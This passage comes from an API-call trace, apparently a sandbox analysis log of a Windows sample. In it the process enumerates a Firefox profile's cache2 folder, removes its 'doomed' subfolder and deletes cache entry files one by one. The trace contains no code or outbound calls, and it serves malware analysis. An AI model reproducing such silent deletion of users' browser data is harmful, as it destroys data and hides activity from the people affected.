"c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2")) returned 0x10 [0253.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\") returned 85 [0253.366] PathCombineW (in: pszDest=0x7aae530, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\*.*" [0253.366] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\*.*", lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 0x442f2d0 [0253.366] FindNextFileW (in: hFindFile=0x442f2d0, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0253.366] FindNextFileW (in: hFindFile=0x442f2d0, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0253.366] lstrlenW (lpString="doomed") returned 6 [0253.366] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\", pszFile="doomed" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed" [0253.366] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed") returned 91 [0253.367] PathCombineW (in: pszDest=0x79c7b40, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed\\*.*" [0253.367] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed\\*.*", lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 0x442fff0 [0253.367] FindNextFileW (in: hFindFile=0x442fff0, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.367] FindNextFileW (in: hFindFile=0x442fff0, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 0 [0253.367] FindClose (in: hFindFile=0x442fff0 | out: hFindFile=0x442fff0) returned 1 [0253.368] RemoveDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\doomed" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\doomed")) returned 1 [0253.368] FindNextFileW (in: hFindFile=0x442f2d0, lpFindFileData=0x7aaf010 | out: lpFindFileData=0x7aaf010) returned 1 [0253.368] lstrlenW (lpString="entries") returned 7 [0253.368] PathCombineW (in: pszDest=0x7aaee00, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\", pszFile="entries" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries" [0253.368] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries") returned 92 [0253.368] PathCombineW (in: pszDest=0x79c8290, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="*.*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\*.*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\*.*" [0253.368] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\*.*", lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 0x442fd50 [0253.376] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.379] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.379] lstrlenW (lpString="00230E843D3A08B230E933E226DB601D643BC852") returned 40 [0253.379] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="00230E843D3A08B230E933E226DB601D643BC852" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00230E843D3A08B230E933E226DB601D643BC852") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00230E843D3A08B230E933E226DB601D643BC852" [0253.379] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00230E843D3A08B230E933E226DB601D643BC852" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\00230e843d3a08b230e933e226db601d643bc852")) returned 1 [0253.382] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.382] lstrlenW (lpString="00396519A728CAF55BA5985F2822E3CD29D0B17E") returned 40 [0253.382] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="00396519A728CAF55BA5985F2822E3CD29D0B17E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00396519A728CAF55BA5985F2822E3CD29D0B17E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00396519A728CAF55BA5985F2822E3CD29D0B17E" [0253.382] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\00396519A728CAF55BA5985F2822E3CD29D0B17E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\00396519a728caf55ba5985f2822e3cd29d0b17e")) returned 1 [0253.383] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.383] lstrlenW (lpString="0070686314FCF810B3CEE062939E2805C4894837") returned 40 [0253.383] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0070686314FCF810B3CEE062939E2805C4894837" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0070686314FCF810B3CEE062939E2805C4894837") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0070686314FCF810B3CEE062939E2805C4894837" [0253.383] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0070686314FCF810B3CEE062939E2805C4894837" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0070686314fcf810b3cee062939e2805c4894837")) returned 1 [0253.384] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.384] lstrlenW (lpString="01936D44B3D7F728EFEB4C28574EF44AB7260A17") returned 40 [0253.384] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="01936D44B3D7F728EFEB4C28574EF44AB7260A17" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01936D44B3D7F728EFEB4C28574EF44AB7260A17") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01936D44B3D7F728EFEB4C28574EF44AB7260A17" [0253.385] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01936D44B3D7F728EFEB4C28574EF44AB7260A17" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\01936d44b3d7f728efeb4c28574ef44ab7260a17")) returned 1 [0253.385] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.385] lstrlenW (lpString="01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF") returned 40 [0253.385] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF" [0253.385] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01CC9F4D43A947CA6202BA62A7FFF28C6881C1BF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\01cc9f4d43a947ca6202ba62a7fff28c6881c1bf")) returned 1 [0253.386] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.386] lstrlenW (lpString="01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6") returned 40 [0253.386] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6" [0253.386] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\01D69525274B61DE5FF860EF9BDF5BEDBB7E52C6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\01d69525274b61de5ff860ef9bdf5bedbb7e52c6")) returned 1 [0253.387] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.387] lstrlenW (lpString="023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08") returned 40 [0253.388] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08" [0253.388] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\023DB71E21A04D5A6CE60A1EC2C15A40BE00DD08" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\023db71e21a04d5a6ce60a1ec2c15a40be00dd08")) returned 1 [0253.389] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.389] lstrlenW (lpString="02556929CF2E7913AF6E896368676F9BEC324DF4") returned 40 [0253.389] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="02556929CF2E7913AF6E896368676F9BEC324DF4" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\02556929CF2E7913AF6E896368676F9BEC324DF4") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\02556929CF2E7913AF6E896368676F9BEC324DF4" [0253.389] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\02556929CF2E7913AF6E896368676F9BEC324DF4" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\02556929cf2e7913af6e896368676f9bec324df4")) returned 1 [0253.389] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.390] lstrlenW (lpString="025E6C3190211A09D15D92E5656FB71220B7737E") returned 40 [0253.390] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="025E6C3190211A09D15D92E5656FB71220B7737E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\025E6C3190211A09D15D92E5656FB71220B7737E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\025E6C3190211A09D15D92E5656FB71220B7737E" [0253.390] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\025E6C3190211A09D15D92E5656FB71220B7737E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\025e6c3190211a09d15d92e5656fb71220b7737e")) returned 1 [0253.391] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.391] lstrlenW (lpString="0396D4FE028249B03B952ECAC5BDC2698D7AC41D") returned 40 [0253.391] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0396D4FE028249B03B952ECAC5BDC2698D7AC41D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0396D4FE028249B03B952ECAC5BDC2698D7AC41D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0396D4FE028249B03B952ECAC5BDC2698D7AC41D" [0253.391] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0396D4FE028249B03B952ECAC5BDC2698D7AC41D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0396d4fe028249b03b952ecac5bdc2698d7ac41d")) returned 1 [0253.392] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.392] lstrlenW (lpString="04407A80544B9CDDB0BF74A9C5090D338DED55E6") returned 40 [0253.392] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="04407A80544B9CDDB0BF74A9C5090D338DED55E6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04407A80544B9CDDB0BF74A9C5090D338DED55E6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04407A80544B9CDDB0BF74A9C5090D338DED55E6" [0253.392] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04407A80544B9CDDB0BF74A9C5090D338DED55E6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\04407a80544b9cddb0bf74a9c5090d338ded55e6")) returned 1 [0253.392] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.393] lstrlenW (lpString="04825B72BD3FF3B25000EE8B3660F3E1748CF56D") returned 40 [0253.393] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="04825B72BD3FF3B25000EE8B3660F3E1748CF56D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04825B72BD3FF3B25000EE8B3660F3E1748CF56D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04825B72BD3FF3B25000EE8B3660F3E1748CF56D" [0253.393] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04825B72BD3FF3B25000EE8B3660F3E1748CF56D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\04825b72bd3ff3b25000ee8b3660f3e1748cf56d")) returned 1 [0253.393] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.393] lstrlenW (lpString="04DDA15772BB1EBE40F174D3D0AD961AB0D85881") returned 40 [0253.393] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="04DDA15772BB1EBE40F174D3D0AD961AB0D85881" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04DDA15772BB1EBE40F174D3D0AD961AB0D85881") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04DDA15772BB1EBE40F174D3D0AD961AB0D85881" [0253.393] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04DDA15772BB1EBE40F174D3D0AD961AB0D85881" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\04dda15772bb1ebe40f174d3d0ad961ab0d85881")) returned 1 [0253.394] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.394] lstrlenW (lpString="04E42D40E9FF818034B152EBBD5D2648E474B06E") returned 40 [0253.394] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="04E42D40E9FF818034B152EBBD5D2648E474B06E" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04E42D40E9FF818034B152EBBD5D2648E474B06E") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04E42D40E9FF818034B152EBBD5D2648E474B06E" [0253.394] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\04E42D40E9FF818034B152EBBD5D2648E474B06E" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\04e42d40e9ff818034b152ebbd5d2648e474b06e")) returned 1 [0253.395] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.395] lstrlenW (lpString="053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0") returned 40 [0253.395] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0" [0253.395] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\053023C6ABE9799C7CBA3D16BB67C1B7F7B0D8A0" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\053023c6abe9799c7cba3d16bb67c1b7f7b0d8a0")) returned 1 [0253.396] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.397] lstrlenW (lpString="062AD3657B516BAF21B6D366104D405078541BA6") returned 40 [0253.397] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="062AD3657B516BAF21B6D366104D405078541BA6" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\062AD3657B516BAF21B6D366104D405078541BA6") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\062AD3657B516BAF21B6D366104D405078541BA6" [0253.397] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\062AD3657B516BAF21B6D366104D405078541BA6" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\062ad3657b516baf21b6d366104d405078541ba6")) returned 1 [0253.397] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.397] lstrlenW (lpString="073B56D883E94B03370493A96DF99C2B51FB3E9D") returned 40 [0253.397] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="073B56D883E94B03370493A96DF99C2B51FB3E9D" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\073B56D883E94B03370493A96DF99C2B51FB3E9D") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\073B56D883E94B03370493A96DF99C2B51FB3E9D" [0253.397] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\073B56D883E94B03370493A96DF99C2B51FB3E9D" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\073b56d883e94b03370493a96df99c2b51fb3e9d")) returned 1 [0253.398] FindNextFileW (in: hFindFile=0x442fd50, lpFindFileData=0x79c8b70 | out: lpFindFileData=0x79c8b70) returned 1 [0253.398] lstrlenW (lpString="0782E7F698BE212FDCB80D8DE2C97C611AE50DFF") returned 40 [0253.398] PathCombineW (in: pszDest=0x79c8960, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries", pszFile="0782E7F698BE212FDCB80D8DE2C97C611AE50DFF" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0782E7F698BE212FDCB80D8DE2C97C611AE50DFF") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0782E7F698BE212FDCB80D8DE2C97C611AE50DFF" [0253.398] DeleteFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cache2\\entries\\0782E7F698BE212FDCB80D8DE2C97C611AE50DFF" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\mozilla\\firefox\\profiles\\8i341t8m.default\\cache2\\entries\\0782e7f698be212fdcb80d8de2c97c611ae50dff")) returned 1 [0253.400] FindNextFileW (in: 